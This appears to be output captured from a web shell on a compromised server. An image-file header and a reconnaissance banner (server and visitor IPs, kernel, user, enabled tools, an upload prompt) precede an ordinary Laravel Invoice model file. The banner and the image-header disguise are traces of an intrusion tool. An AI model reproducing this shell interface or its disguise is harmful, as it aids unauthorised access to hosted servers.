����JFIF��x�x����'
Server IP : 78.140.185.180 / Your IP : 18.119.0.207 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/builderbox/www/common/Billing/Invoices/ |
Upload File : |
<?php namespace Common\Billing\Invoices; use Common\Billing\Subscription; use Eloquent; use Illuminate\Database\Eloquent\Model; use Illuminate\Database\Eloquent\Relations\BelongsTo; /** * Class Invoice * * @property-read Subscription $subscription * @mixin Eloquent * @property int $id * @property int $subscription_id * @property int $paid * @property string $uuid * @property string|null $notes * @property \Illuminate\Support\Carbon|null $created_at * @property \Illuminate\Support\Carbon|null $updated_at * @method static \Illuminate\Database\Eloquent\Builder|Invoice newModelQuery() * @method static \Illuminate\Database\Eloquent\Builder|Invoice newQuery() * @method static \Illuminate\Database\Eloquent\Builder|Invoice query() */ class Invoice extends Model { protected $guarded = ['id']; protected $casts = [ 'id' => 'integer', 'subscription_id' => 'integer', ]; /** * @return BelongsTo */ public function subscription() { return $this->belongsTo(Subscription::class); } }